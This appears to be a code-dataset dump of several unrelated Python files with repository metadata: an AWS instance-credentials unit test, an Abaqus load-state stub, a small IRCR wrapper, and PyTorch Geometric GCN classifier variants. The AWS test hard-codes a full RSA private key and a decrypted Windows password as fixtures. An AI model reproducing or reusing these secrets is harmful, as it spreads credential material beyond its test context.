| 43.60781 | 93 | 0.509091 | 4,608 | 51,370 | 5.361979 | 0.060547 | 0.078922 | 0.112312 | 0.038044 | 0.965558 | 0.961268 | 0.953618 | 0.9435 | 0.936458 | 0.926056 | 0 | 0.020226 | 0.384037 | 51,370 | 1,177 | 94 | 43.64486 | 0.760635 | 0.031925 | 0 | 0.792183 | 0 | 0 | 0.230901 | 0.083029 | 0 | 0 | 0 | 0 | 0.064824 | 1 | 0.020019 | false | 0.00286 | 0.00858 | 0 | 0.030505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24f5d20a89c5bc2133ac31deb764a8d8e39662fb | 3,431 | py | Python | package/tests/test_domain_services/test_ami_creds_service.py | DYeag/AWS-Shell | b5318e72373b1a948ac6aced1c0bb4566d5ae46f | [
"0BSD"
] | 3 | 2016-08-22T07:14:56.000Z | 2018-03-16T07:31:44.000Z | package/tests/test_domain_services/test_ami_creds_service.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 470 | 2016-03-24T13:38:08.000Z | 2022-02-05T01:14:05.000Z | package/tests/test_domain_services/test_ami_creds_service.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 9 | 2016-06-20T11:41:54.000Z | 2020-11-21T00:42:45.000Z | from unittest import TestCase
from mock import Mock
from cloudshell.cp.aws.domain.services.ec2.instance_credentials import InstanceCredentialsService
from cloudshell.cp.aws.domain.services.waiters.password import PasswordWaiter
class TestAmiCredentialsService(TestCase):
def setUp(self):
self.password_waiter = Mock(spec=PasswordWaiter)
self.credentials_service = InstanceCredentialsService(self.password_waiter)
self.pem = ['-----BEGIN RSA PRIVATE KEY-----\n',
'MIIEpQIBAAKCAQEAzdX6TR8fnJ0vXilViU5OHzvHfQVXdCufZcr1yDiT3hJ04IgX/INaOfI5+xIC\n', '+qrl9IMJ19Tol/t+asB3eiIo2DK6K5DFYhBDSGKfC2AE+c53B/eeTq/+CGjTma6bNaFSNkiJdOhM\n', 'fNdmAOYYx4B2PqZXgNPGbN3WEGYldU6DiX1IU/hmihjdoW8oL/84DUrkJCl+lZhqP9uVHMp/8yzu\n', 'GovUOF2FNuXMo0tSFeUBeUKZig28u/lhuCEqq2TkHbpvlojjyVqqRoxqw/2ZnUua4PnKSx1U8ddg\n', 'OGg4QXxX1D2DQ8XpRL7pEYdK3A51AaZr7IcpSwtDm5XS/FZ0slCUFwIDAQABAoIBAB3hlGahwAsS\n', 'XpAC3CIEth6epQUnQ1zgAFHctvWMERtJ/qGh4CmOQAjtezFRmhEdwihO5ZzpkaKOpfmFW1LlppxM\n', 'MO6mI6FqzvmxJ3mVROOm72y+q8KslepOnXlP+cQ9WRv8R8gq+P+enXY/8RT1NzU9HLLdC48+XRcg\n', 'XQu8jCfnP1yxKFBxvd8iJtb59KWtaljHoYZSy1P+QPXWtaMb9p+Vd91g9UfPr0b5Ih+Q2AZQP1/F\n', 'I+TypGCEp16K2xIiXaf/CxEWGfRTnwhyyxnEB0apcDv4KJtiZlcl81y3Haeuo6+A8PksnVXDACY3\n', 'GRLksEGIfokb9rqFnk4ay37N1zECgYEA8ggt65yj6iAp1WzspinzxKjQovcUBt1nMo63I1RB41fb\n', 'g0kVHigZDpoqziSZoHmt7mSjS1OBq6xNnmtCOFF4uYkA5d7WyFSfeKSXqT5WFfPOOoGVnw4mIoeD\n', 'OVV401pObis+sVhIYb5nOepDjnV7XIiIlV8DRu8RuP+PKp8C9x0CgYEA2bcH9tJHTqUOs4us0KWO\n', '+5To96iEqqs5bnIZueNGRDGZkSrjX46IGS5o+awCChvvJAPf/CRSpoQhQqcUCy+deNrfQHt2Zpaq\n', 'gD9Qv3AKv5ESnvqnLVFy4FVYvTIDxs8rbTAVHe1/IBi5+xAOnpi2riPhTOVzyJ8NhhwtVYyDbcMC\n', 'gYEA2HcESvOfjmgRwjZXOQ3QXZT2dKoymSkvgQIvPUPAYgpT44lbf8sxDeRIYHJPjD0HmG0dtuMK\n', '2HWUPhmD8ka7iITF7tFsm2ND9WyPz+hWqe+SBLWdEdJfvQYiEQcmtzDPcKzwt0BUDEd0n1Gr9h+Q\n', 'o2PhdGaz0Z9D5Id8jgwFZOkCgYEA0hPg5XPGRsbSRsGyQapfK7dmjQLY8O5DfqUu2cXKWacarY8a\n', '02vvO40i0jf9x89ok/IBQYWzEuZQScZ6esi5RJK99bSsbRVY9GMkAXWViX/s3eazRfFfzcPM2tLV\n', '/hKNrtBEsBopHsl9PBskYDivnZ0Vm2OUs7N2E0BBJlltwI0CgYEA5/eb88pqBcCrfrYi4U8WN3id\n', 'o0t3dj4ca7BPGwvGGMuEB4JPZmsS3AWMGXKSBpEpqMSxHMeTZtxo/ioi4mEGM5SMi0KLSnrWuuYX\n', '+OQfjjQfag6Y7SdiQAyhvpndODqEiqfFDqCnR11T447V/JwyEdxFUwYoLiot5tcZOOOxl2o=\n', '-----END RSA PRIVATE KEY-----']
self.encrypted = 'NGtKthoEIcRdof+dlQJcJ87HQpPfjwFHKe6e5fiSCt2l523FWgIuqIv+Pda/KF+q/jzhacospZUjQqSBX7aKHA1Qm7tWsNywYP0nAypJOTU0UtJZKVZ9ymXHsPXq+kvaEtq0xvl08MCKUiROlV7jlS1sySvspcum5E49s8lm2nAS9W4dljdytFP/CtEDEfOec87DQG9aCPsDOGbH8efWpEDEQ5pzNhybGyrlI3x8PxFM5JNtSZFTQxCs0vfYjsM2I3VKcrIuVGaQOu9qZZArzANUDCbE3V+BD664y0W5h4RjyowhEAtcTc8NxEFAYOKMJAb253TjLr3Vk/7MmwgFkA=='
self.decrypted = '542(LhS@Ymq'
def test_get_windows_credentials_wait(self):
instance = Mock()
instance.password_data = Mock(return_value={'PasswordData': ''})
self.password_waiter.wait = Mock(return_value=self.encrypted)
res = self.credentials_service.get_windows_credentials(instance, ''.join(self.pem))
self.assertEquals(self.decrypted, self.credentials_service.decrypt_password(self.pem, self.encrypted), res.password)
self.assertEquals('Administrator', res.user_name, InstanceCredentialsService.DEFAULT_USER_NAME)
def test_get_default_linux_credentials(self):
cred = self.credentials_service.get_default_linux_credentials()
self.assertEquals(cred.user_name, 'root')
self.assertFalse(cred.password)
| 107.21875 | 1,770 | 0.843486 | 247 | 3,431 | 11.59919 | 0.526316 | 0.020942 | 0.030716 | 0.013264 | 0.043979 | 0.023037 | 0 | 0 | 0 | 0 | 0 | 0.088854 | 0.071699 | 3,431 | 31 | 1,771 | 110.677419 | 0.810675 | 0 | 0 | 0 | 0 | 0 | 0.606237 | 0.576508 | 0 | 1 | 0 | 0 | 0.173913 | 1 | 0.130435 | false | 0.304348 | 0.173913 | 0 | 0.347826 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
700fef6d48c6d979cd305e567f0da7f54f6ec0af | 4,197 | py | Python | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
from .LoadState import LoadState
class SubmodelSBState(LoadState):
"""The SubmodelSBState object stores the propagating data for a Submodel load in a step.
One instance of this object is created internally by the SubmodelSB object for each
step. The instance is also deleted internally by the SubmodelSB object.
The SubmodelSBState object has no constructor or methods.
The SubmodelSBState object is derived from the LoadState object.
Attributes
----------
globalStepState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **globalStep** member. Possible
values are SET and UNCHANGED.
globalIncrement: int
An Int specifying the increment number in the global model step at which the solution
will be used to specify the values of the driven variables. This argument is applicable
only for linear perturbation steps.
globalIncrementState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **globalIncrement** member.
Possible values are SET and UNCHANGED.
globalStep: str
A String specifying the step in the global model from which Abaqus reads the values of
the variables that will drive the submodel analysis. The String indicates the position
of the step in the sequence of analysis steps. For example, **globalStep**='1' indicates
the first step.
amplitudeState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **amplitude** member. Possible
values are UNSET, SET, UNCHANGED, and FREED.
status: SymbolicConstant
A SymbolicConstant specifying the propagation state of the :py:class:`~abaqus.Load.LoadState.LoadState` object. Possible
values are:
- NOT_YET_ACTIVE
- CREATED
- PROPAGATED
- MODIFIED
- DEACTIVATED
- NO_LONGER_ACTIVE
- TYPE_NOT_APPLICABLE
- INSTANCE_NOT_APPLICABLE
- BUILT_INTO_BASE_STATE
amplitude: str
A String specifying the name of the amplitude reference. The String is empty if the load
has no amplitude reference.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].steps[name].loadStates[name]
The corresponding analysis keywords are:
- SUBMODEL
- DSLOAD
"""
# A SymbolicConstant specifying the propagation state of the *globalStep* member. Possible
# values are SET and UNCHANGED.
globalStepState: SymbolicConstant = None
# An Int specifying the increment number in the global model step at which the solution
# will be used to specify the values of the driven variables. This argument is applicable
# only for linear perturbation steps.
globalIncrement: int = None
# A SymbolicConstant specifying the propagation state of the *globalIncrement* member.
# Possible values are SET and UNCHANGED.
globalIncrementState: SymbolicConstant = None
# A String specifying the step in the global model from which Abaqus reads the values of
# the variables that will drive the submodel analysis. The String indicates the position
# of the step in the sequence of analysis steps. For example, *globalStep*='1' indicates
# the first step.
globalStep: str = ''
# A SymbolicConstant specifying the propagation state of the *amplitude* member. Possible
# values are UNSET, SET, UNCHANGED, and FREED.
amplitudeState: SymbolicConstant = None
# A SymbolicConstant specifying the propagation state of the LoadState object. Possible
# values are:
# - NOT_YET_ACTIVE
# - CREATED
# - PROPAGATED
# - MODIFIED
# - DEACTIVATED
# - NO_LONGER_ACTIVE
# - TYPE_NOT_APPLICABLE
# - INSTANCE_NOT_APPLICABLE
# - BUILT_INTO_BASE_STATE
status: SymbolicConstant = None
# A String specifying the name of the amplitude reference. The String is empty if the load
# has no amplitude reference.
amplitude: str = ''
| 40.747573 | 128 | 0.699071 | 499 | 4,197 | 5.835671 | 0.240481 | 0.027473 | 0.074176 | 0.082418 | 0.750687 | 0.727335 | 0.713599 | 0.713599 | 0.713599 | 0.653846 | 0 | 0.000639 | 0.254467 | 4,197 | 102 | 129 | 41.147059 | 0.93001 | 0.824875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
708c7c3ff17e0ca3421c55c2ec4afb5bebf42c80 | 204 | py | Python | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | 1 | 2022-03-21T21:38:15.000Z | 2022-03-21T21:38:15.000Z | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | null | null | null | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | null | null | null | from algorithm import basis_algorithm_collection
def IRCR(args):
# The algorithmic components of IRCR is implemented in the replay buffer.
return basis_algorithm_collection[args.basis_alg](args)
| 34 | 77 | 0.808824 | 28 | 204 | 5.714286 | 0.678571 | 0.175 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142157 | 204 | 5 | 78 | 40.8 | 0.914286 | 0.348039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
5656f1b44b514c2945132ce69bd79d13fea68b02 | 20,587 | py | Python | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | 10 | 2019-05-02T08:42:09.000Z | 2021-03-15T05:44:29.000Z | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | null | null | null | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | 5 | 2019-03-22T06:21:33.000Z | 2020-07-10T09:13:35.000Z | import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.data import Data
from torch_geometric.data import DataLoader
from torch_geometric.nn import GCNConv, ChebConv # noqa
from torch_geometric.utils import normalized_cut
from torch_geometric.nn import (SplineConv, graclus, max_pool, max_pool_x,
global_mean_pool)
log = logging.getLogger(__name__)
def normalized_cut_2d(edge_index, pos):
    """Compute per-edge weights for graph coarsening.

    Each edge is weighted by the Euclidean (L2) distance between the 2-D
    positions of its endpoints, then passed through PyG's ``normalized_cut``.

    :param edge_index: (2, num_edges) tensor of source/target node indices.
    :param pos: (num_nodes, 2) tensor of node positions.
    :return: 1-D tensor of normalized-cut edge weights.
    """
    src, dst = edge_index
    # L2 length of every edge in position space.
    edge_lengths = (pos[src] - pos[dst]).norm(p=2, dim=1)
    return normalized_cut(edge_index, edge_lengths, num_nodes=pos.size(0))
class GCN_test(torch.nn.Module):
    """Five-layer GCN baseline followed by a two-layer MLP head.

    The convolutions grow the per-node channels 8 -> 8 -> 16 -> 16 -> 32;
    the node features are then flattened and classified.

    NOTE(review): ``fc1`` expects a flattened vector of 768 features
    (presumably 24 nodes x 32 channels) and ``forward`` processes a single
    graph at a time -- confirm against the dataset/loader.
    """

    def __init__(self, numFeatures, numClasses):
        """Build the layer stack.

        :param numFeatures: number of input features per node.
        :param numClasses: number of output classes.
        """
        super().__init__()

        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)

        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses * 1)

    def forward(self, data):
        """Run the network on one graph; return (1, numClasses) log-probs."""
        data.x = F.relu(self.conv1(data.x, data.edge_index))
        data.x = F.relu(self.conv2(data.x, data.edge_index))
        data.x = F.relu(self.conv3(data.x, data.edge_index))
        data.x = F.relu(self.conv4(data.x, data.edge_index))
        data.x = F.relu(self.conv5(data.x, data.edge_index))

        log.debug(data.x.view(-1).size())

        data.x = self.fc1(data.x.view(-1))
        data.x = self.fc2(data.x)

        log.debug(data.x.size())

        # Fix: reshape to (1, -1) instead of the hard-coded (1, 2) so the
        # network also works when numClasses != 2 (fc2 already emits
        # numClasses values).
        data.x = F.log_softmax(data.x.view(1, -1), dim=1)

        log.debug(data.x.size())

        return data.x
class GCN_32(torch.nn.Module):
    """Single 32-channel GCN layer with graclus pooling and a linear head."""

    def __init__(self, numFeatures, numClasses):
        """:param numFeatures: input features per node.
        :param numClasses: number of output classes."""
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 32)
        self.fc1 = torch.nn.Linear(32, numClasses)

    def forward(self, data):
        """Return per-graph class log-probabilities."""
        # Graph convolution with ReLU and dropout (dropout is active only
        # while training).
        data.x = F.relu(self.conv1(data.x, data.edge_index))
        data.x = F.dropout(data.x, training=self.training)

        # Coarsen via graclus clustering weighted by normalized cuts, then
        # average the pooled node features per graph.
        edge_weight = normalized_cut_2d(data.edge_index, data.pos)
        clusters = graclus(data.edge_index, edge_weight, data.x.size(0))
        data.x, pooled_batch = max_pool_x(clusters, data.x, data.batch)
        data.x = global_mean_pool(data.x, pooled_batch)

        # Linear classifier with log-softmax output.
        data.x = self.fc1(data.x)
        data.x = F.log_softmax(data.x, dim=1)
        return data.x
class GCN_32_64(torch.nn.Module):
    """Two-layer (32 -> 64) GCN with graclus pooling and a linear classifier."""

    def __init__(self, numFeatures, numClasses):
        """:param numFeatures: input features per node.
        :param numClasses: number of output classes."""
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 32)
        self.conv2 = GCNConv(32, 64)
        self.fc1 = torch.nn.Linear(64, numClasses)

    def forward(self, data):
        """Return per-graph class log-probabilities."""
        # First convolution uses ReLU + dropout; the second is applied
        # without an activation, as in the sibling architectures.
        data.x = F.relu(self.conv1(data.x, data.edge_index))
        data.x = F.dropout(data.x, training=self.training)
        data.x = self.conv2(data.x, data.edge_index)

        # Pool: graclus clusters weighted by normalized cuts, then a
        # per-graph mean over the pooled node features.
        cut_weights = normalized_cut_2d(data.edge_index, data.pos)
        assignment = graclus(data.edge_index, cut_weights, data.x.size(0))
        data.x, pooled_batch = max_pool_x(assignment, data.x, data.batch)
        data.x = global_mean_pool(data.x, pooled_batch)

        # Classification head.
        data.x = self.fc1(data.x)
        data.x = F.log_softmax(data.x, dim=1)
        return data.x
class GCN_32_64_128(torch.nn.Module):
    """Three-layer (32 -> 64 -> 128) GCN with graclus pooling and a linear head."""

    def __init__(self, numFeatures, numClasses):
        """:param numFeatures: input features per node.
        :param numClasses: number of output classes."""
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 32)
        self.conv2 = GCNConv(32, 64)
        self.conv3 = GCNConv(64, 128)
        self.fc1 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        """Return per-graph class log-probabilities."""
        # Only the first convolution gets ReLU + dropout; the deeper layers
        # are applied without activations, as in the sibling models.
        data.x = F.relu(self.conv1(data.x, data.edge_index))
        data.x = F.dropout(data.x, training=self.training)
        data.x = self.conv2(data.x, data.edge_index)
        data.x = self.conv3(data.x, data.edge_index)

        # Graclus coarsening (weighted by normalized cuts) followed by a
        # per-graph mean of the pooled features.
        cut_weights = normalized_cut_2d(data.edge_index, data.pos)
        assignment = graclus(data.edge_index, cut_weights, data.x.size(0))
        data.x, pooled_batch = max_pool_x(assignment, data.x, data.batch)
        data.x = global_mean_pool(data.x, pooled_batch)

        # Classification head.
        data.x = self.fc1(data.x)
        data.x = F.log_softmax(data.x, dim=1)
        return data.x
### Networks for depth tests
class GCN_8(torch.nn.Module):
    """One 8-channel GCN layer followed by a two-layer MLP over the flattened
    node features.

    The fc1 input of 192 assumes a fixed flattened size (presumably 24 nodes
    x 8 channels — TODO confirm), and view(1, 2) assumes two classes.
    """

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.fc1 = torch.nn.Linear(192, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        hidden = F.relu(self.conv1(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(hidden.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8(torch.nn.Module):
    """Two 8-channel GCN layers, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 192 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.fc1 = torch.nn.Linear(192, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        # Each GCN layer is followed by a ReLU.
        for conv in (self.conv1, self.conv2):
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_8(torch.nn.Module):
    """Three 8-channel GCN layers, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 192 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 8)
        self.fc1 = torch.nn.Linear(192, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        for conv in (self.conv1, self.conv2, self.conv3):
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_8_8(torch.nn.Module):
    """Four 8-channel GCN layers, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 192 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 8)
        self.conv4 = GCNConv(8, 8)
        self.fc1 = torch.nn.Linear(192, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        for conv in (self.conv1, self.conv2, self.conv3, self.conv4):
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_8_8_8(torch.nn.Module):
    """Five 8-channel GCN layers, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 192 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 8)
        self.conv4 = GCNConv(8, 8)
        self.conv5 = GCNConv(8, 8)
        self.fc1 = torch.nn.Linear(192, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4, self.conv5)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_16(torch.nn.Module):
    """GCN stack 8-8-16, then a two-layer MLP head over the flattened node
    features (fc1 assumes a fixed flattened size of 384 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.fc1 = torch.nn.Linear(384, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        for conv in (self.conv1, self.conv2, self.conv3):
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_16_16(torch.nn.Module):
    """GCN stack 8-8-16-16, then a two-layer MLP head over the flattened node
    features (fc1 assumes a fixed flattened size of 384 — TODO confirm)."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.fc1 = torch.nn.Linear(384, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        for conv in (self.conv1, self.conv2, self.conv3, self.conv4):
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = self.fc2(self.fc1(data.x.view(-1)))
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        return data.x
class GCN_8_8_16_16_32(torch.nn.Module):
    """GCN stack 8-8-16-16-32, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 768 — TODO confirm).
    Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4, self.conv5)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8d_8d_16d_16d_32d(torch.nn.Module):
    """Dropout variant of GCN_8_8_16_16_32: every GCN layer is followed by
    ReLU and dropout (fc1 assumes a fixed flattened size of 768 — TODO
    confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4, self.conv5)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
            data.x = F.dropout(data.x, training=self.training)
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8_8_16_16_32_32(torch.nn.Module):
    """GCN stack 8-8-16-16-32-32, then a two-layer MLP head over the flattened
    node features (fc1 assumes a fixed flattened size of 768 — TODO confirm).
    Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.conv6 = GCNConv(32, 32)
        self.fc1 = torch.nn.Linear(768, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3,
                  self.conv4, self.conv5, self.conv6)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8_8_16_16_32_32_48(torch.nn.Module):
    """GCN stack 8-8-16-16-32-32-48, then a two-layer MLP head over the
    flattened node features (fc1 assumes a fixed flattened size of 1152 —
    TODO confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.conv6 = GCNConv(32, 32)
        self.conv7 = GCNConv(32, 48)
        self.fc1 = torch.nn.Linear(1152, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4,
                  self.conv5, self.conv6, self.conv7)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
class GCN_8_8_16_16_32_32_48_48(torch.nn.Module):
    """GCN stack 8-8-16-16-32-32-48-48, then a two-layer MLP head over the
    flattened node features (fc1 assumes a fixed flattened size of 1152 —
    TODO confirm). Tensor sizes are logged at debug level around the head."""

    def __init__(self, numFeatures, numClasses):
        super().__init__()
        self.conv1 = GCNConv(numFeatures, 8)
        self.conv2 = GCNConv(8, 8)
        self.conv3 = GCNConv(8, 16)
        self.conv4 = GCNConv(16, 16)
        self.conv5 = GCNConv(16, 32)
        self.conv6 = GCNConv(32, 32)
        self.conv7 = GCNConv(32, 48)
        self.conv8 = GCNConv(48, 48)
        self.fc1 = torch.nn.Linear(1152, 128)
        self.fc2 = torch.nn.Linear(128, numClasses)

    def forward(self, data):
        layers = (self.conv1, self.conv2, self.conv3, self.conv4,
                  self.conv5, self.conv6, self.conv7, self.conv8)
        for conv in layers:
            data.x = F.relu(conv(data.x, data.edge_index))
        data.x = data.x.view(-1)
        log.debug(data.x.size())
        data.x = self.fc2(self.fc1(data.x))
        log.debug(data.x.size())
        data.x = F.log_softmax(data.x.view(1, 2), dim=1)
        log.debug(data.x.size())
        return data.x
